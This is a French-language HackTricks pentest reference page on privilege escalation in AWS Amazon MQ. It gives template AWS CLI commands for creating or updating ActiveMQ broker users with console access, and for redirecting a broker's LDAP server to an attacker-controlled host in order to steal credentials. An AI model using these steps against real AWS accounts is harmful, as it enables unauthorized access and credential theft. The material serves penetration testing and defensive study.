AWS - MQ Privesc

Soutenez HackTricks

MQ

Pour plus d'informations sur MQ, consultez :

AWS - MQ Enum

mq:ListBrokers, mq:CreateUser

Avec ces autorisations, vous pouvez créer un nouvel utilisateur dans un courtier ActimeMQ (cela ne fonctionne pas avec RabbitMQ) :

aws mq list-brokers
aws mq create-user --broker-id <value> --console-access --password <value> --username <value>

Impact potentiel : Accéder à des informations sensibles en naviguant dans ActiveMQ

mq:ListBrokers, mq:ListUsers, mq:UpdateUser

Avec ces autorisations, vous pouvez créer un nouvel utilisateur dans un courtier ActimeMQ (cela ne fonctionne pas dans RabbitMQ) :

aws mq list-brokers
aws mq list-users --broker-id <value>
aws mq update-user --broker-id <value> --console-access --password <value> --username <value>

Impact potentiel : Accéder à des informations sensibles en naviguant dans ActiveMQ

mq:ListBrokers, mq:UpdateBroker

Si un courtier utilise LDAP pour l'autorisation avec ActiveMQ. Il est possible de modifier la configuration du serveur LDAP utilisé pour un contrôlé par l'attaquant. De cette manière, l'attaquant pourra voler toutes les informations d'identification envoyées via LDAP.

aws mq list-brokers
aws mq update-broker --broker-id <value> --ldap-server-metadata=...

Si vous pouviez somehow trouver les identifiants originaux utilisés par ActiveMQ, vous pourriez effectuer une attaque de l'homme du milieu, voler les identifiants, les utiliser sur le serveur d'origine et envoyer la réponse (peut-être en réutilisant simplement les identifiants volés vous pourriez le faire).

Impact potentiel : Voler les identifiants ActiveMQ

Soutenez HackTricks

Last updated